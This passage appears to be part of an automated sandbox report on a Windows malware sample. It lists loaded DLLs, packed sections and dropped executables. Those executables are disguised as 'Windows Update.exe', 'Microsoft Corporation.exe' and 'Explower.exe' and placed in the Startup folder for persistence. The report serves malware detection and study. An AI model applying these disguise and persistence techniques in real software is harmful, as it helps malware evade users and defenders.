          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: acgenral.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: acgenral.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: samcli.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: msacm32.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: aclayers.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sfc.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sfc_os.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: textinputframework.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: slc.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: mscoree.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: shfolder.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeSection loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: slc.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: LisectAVT_2403002B_366.exeStatic file information: File size 1214464 > 1048576
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeUnpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeUnpacked PE file: 1.2.RRqyIX.exe.ae0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
          Source: C:\Users\user\AppData\Local\Temp\server.exeUnpacked PE file: 4.2.server.exe.9a0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeUnpacked PE file: 15.2.RRqyIX.exe.a30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeUnpacked PE file: 21.2.Microsoft Corporation.exe.930000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeUnpacked PE file: 22.2.RRqyIX.exe.510000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeUnpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
          Source: initial sampleStatic PE information: section where entry point is pointing to: du
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name: du
          Source: server.exe.0.drStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name: du
          Source: RRqyIX.exe.0.drStatic PE information: section name: .aspack
          Source: RRqyIX.exe.0.drStatic PE information: section name: .adata
          Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
          Source: MyProg.exe.1.drStatic PE information: section name: PELIB
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
          Source: SciTE.exe.1.drStatic PE information: section name: u
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name: du
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name: du
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name: du
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name: du
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name: du
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name: du
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name: du
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name: du
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name: du
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name: du
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name: du
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name: du
          Source: system.exe.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name: du
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name: du
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006382D8 push ecx; mov dword ptr [esp], eax0_2_006382D9
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0062447A push 006244A8h; ret 0_2_006244A0
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006244EC push 00624518h; ret 0_2_00624510
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006244B4 push 006244E0h; ret 0_2_006244D8
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00624524 push 00624550h; ret 0_2_00624548
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0063853C push ecx; mov dword ptr [esp], edx0_2_00638541
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0062C5A8 push 0062C754h; ret 0_2_0062C74C
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00624588 push 006245BCh; ret 0_2_006245B4
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00622630 push 00622681h; ret 0_2_00622679
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00638764 push ecx; mov dword ptr [esp], edx0_2_00638769
